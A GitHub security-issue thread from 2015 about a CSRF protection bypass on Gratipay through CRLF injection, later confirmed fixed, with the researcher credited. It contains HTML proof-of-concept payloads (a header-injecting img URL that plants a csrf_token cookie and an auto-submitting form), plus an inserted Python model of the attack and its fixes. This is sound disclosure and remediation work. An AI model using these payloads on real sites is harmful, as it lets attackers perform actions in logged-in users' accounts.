CSRF Protection Bypass #1

Closed
chadwhitacre opened this Issue Jun 16, 2015 · 8 comments

Comments

chadwhitacre commented Jun 16, 2015

https://gratipay.freshdesk.com/helpdesk/tickets/2305

== CSRF Protection Bypass (Chrome, Internet Explorer) ==

  1. Change name in form action to victim name
  2. Open html PoC

```html
<img src="http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;">
```

Result in attachment.

[Attachment: screenshot at 00-10-57]

chadwhitacre commented Jun 16, 2015

I tried with this PoC, and was not able to reproduce his result (except when I was logged in as the target, or as an admin):

```html
<img src="http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;">
<form action="https://gratipay.com/~lgtest/statement.json" method="POST">
    <input type="hidden" name="csrf_token" value="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
    <input type="hidden" name="lang" value="en">
    <input type="input" name="content">
    <button type="submit">Submit</button>
</form>
```
chadwhitacre commented Jun 16, 2015

To: [researcher]

The first issue you reported has already been reported [https://github.com/gratipay/security-b50267/issues/1].

The second and third are new reports. I've confirmed your result for the second report [https://github.com/gratipay/security-qf35us/issues/1], and we'll be happy to add you to our Hall of Fame when we fix that bug.

I haven't yet reconstructed the HTML PoC you used for the third report. Are you able to provide that?

Thanks for the reports!

chadwhitacre commented Jun 17, 2015

From: [researcher]

Hi, this CSRF bypass uses CRLF Injection. (Do not forget to change the name in the form action)

```html
<form id="csrf" action="https://gratipay.com/~fickov/statement.json" method="POST">
<input type="hidden" name="lang" value="en" />
<input type="hidden" name="content" value="CSRF_TEST" />
<input type="hidden" name="csrf_token" value="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" />
<input type="submit" value="Submit request" />
</form>
<img src="http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;" onerror="csrf.submit()">
```
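The mechanics of the bypass above, as an added example that is not code from the report, from Gratipay or from Aspen: a server-side redirect that echoes the request path into the Location header (an assumed injection point; the thread does not say which header was affected), a browser-side header parse that treats a bare CR as a line break, as the report says Chrome and Internet Explorer did, a double-submit cookie check that the planted cookie satisfies, and two hardening steps: rejecting CR/LF in anything that reaches a header, and binding the CSRF token to the session cookie so a value an attacker can plant does not verify. The redirect, the `session` cookie, the server secret and the fix itself are hypothetical; the real fix the thread refers to (security-qf35us#2) is not on this page.

```python
"""Added example, not Gratipay/Aspen code: CRLF injection -> planted csrf_token
cookie -> double-submit CSRF check bypassed, plus two hardening steps.

Assumptions (hypothetical): the server emits a redirect whose Location echoes
the request path; the CSRF defence compares the csrf_token cookie with the
csrf_token form field; the browser splits headers on a bare CR.
"""
import hashlib
import hmac
import re
from urllib.parse import unquote

ATTACKER_TOKEN = "x" * 32                              # value from the PoC
ATTACKER_PATH = "/%0dSet-Cookie:csrf_token=" + ATTACKER_TOKEN + ";"


def redirect_vulnerable(path):
    """Canonicalising redirect that pastes the decoded path into Location.
    A %0d in the path becomes a raw CR inside the header block."""
    return ("HTTP/1.1 302 Found\r\nLocation: https://gratipay.com"
            + unquote(path) + "/\r\n\r\n")


def redirect_fixed(path):
    """Same redirect, but CR/LF (percent-encoded or not) are refused
    before the value can reach a header (one possible fix, assumed)."""
    decoded = unquote(path)
    if re.search(r"[\r\n]", decoded):
        raise ValueError("control characters in request path")
    return "HTTP/1.1 302 Found\r\nLocation: https://gratipay.com" + decoded + "/\r\n\r\n"


def browser_cookies(raw_response):
    """Lenient header parse modelling the browsers named in the report
    (assumption): \\r\\n, \\r or \\n all end a header line.
    Returns {cookie_name: value} for every Set-Cookie seen."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    jar = {}
    for line in re.split(r"\r\n|\r|\n", head)[1:]:      # skip status line
        name, _, value = line.partition(":")
        if name.strip().lower() == "set-cookie":
            pair = value.split(";", 1)[0]               # drop cookie attributes
            cname, _, cvalue = pair.partition("=")
            jar[cname.strip()] = cvalue.strip()
    return jar


def csrf_ok_double_submit(cookies, form):
    """Naive double-submit check: cookie value must equal the posted field.
    Anyone who can set a cookie on the origin can satisfy it."""
    expected = cookies.get("csrf_token", "")
    return bool(expected) and hmac.compare_digest(expected, form.get("csrf_token", ""))


SERVER_SECRET = b"server-side-secret-never-sent-to-the-browser"   # constructed


def issue_session_bound_token(session_id):
    """Token derived from the (HttpOnly) session cookie with a server secret."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_ok_session_bound(cookies, form):
    """Hardened check: the posted token must be the HMAC of the session cookie,
    so a csrf_token cookie an attacker planted is simply ignored."""
    session_id = cookies.get("session", "")
    posted = form.get("csrf_token", "")
    return bool(session_id) and hmac.compare_digest(
        issue_session_bound_token(session_id), posted)


def demo():
    """Replays the PoC: victim loads the <img>, then the form auto-submits."""
    victim_cookies = {"session": "victim-session-id"}   # constructed session
    # 1. the <img> request hits the vulnerable redirect; the injected header plants the cookie
    victim_cookies.update(browser_cookies(redirect_vulnerable(ATTACKER_PATH)))
    # 2. the auto-submitted form carries the same value the attacker chose
    form = {"lang": "en", "content": "CSRF_TEST", "csrf_token": ATTACKER_TOKEN}
    return {
        "planted": victim_cookies.get("csrf_token") == ATTACKER_TOKEN,
        "double_submit_passes": csrf_ok_double_submit(victim_cookies, form),
        "session_bound_passes": csrf_ok_session_bound(victim_cookies, form),
    }


def fixed_redirect_rejects():
    """True if the hardened redirect refuses the PoC path."""
    try:
        redirect_fixed(ATTACKER_PATH)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(demo(), "fixed redirect rejects PoC:", fixed_redirect_rejects())
```

Two independent defects combine here: the header injection (which also lets an attacker set any cookie, not just csrf_token) and a CSRF check whose secret lives in a cookie the attacker can overwrite. Fixing the injection closes this PoC; binding the token to the session closes the whole class, including cookie planting from subdomains or over plain HTTP.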
chadwhitacre commented Jun 17, 2015

Right. The point of a CSRF is to initiate an action on Gratipay for a logged-in user, when that logged-in user visits a third-party website. My PoC reconstruction was accurate, I was just not interpreting the results properly.

chadwhitacre commented Jun 17, 2015

To: [researcher]

Thanks, []. Bug confirmed. I'll contact you again when we've fixed it.

chadwhitacre commented Jun 29, 2015

Deploying gratipay/security-qf35us#2 ought to fix this.

chadwhitacre commented Jul 2, 2015

Confirmed fixed.

chadwhitacre added a commit to gratipay/gratipay.com that referenced this issue Jul 23, 2015
chadwhitacre commented Jul 29, 2015

To: researcher

The CRLF Injection and CSRF Protection Bypass bugs should be fixed now. Please confirm.

I've added you to our legacy Halls of Fame for Aspen (for the CRLF injection) and Gratipay (for the CSRF protection bypass):

http://aspen.io/security.txt
https://gratipay.com/about/security/hall-of-fame

We've now migrated our security program to HackerOne. If you would like acknowledgement on HackerOne feel free to re-file the bugs there and I will resolve them.

Thanks for the reports! :-)
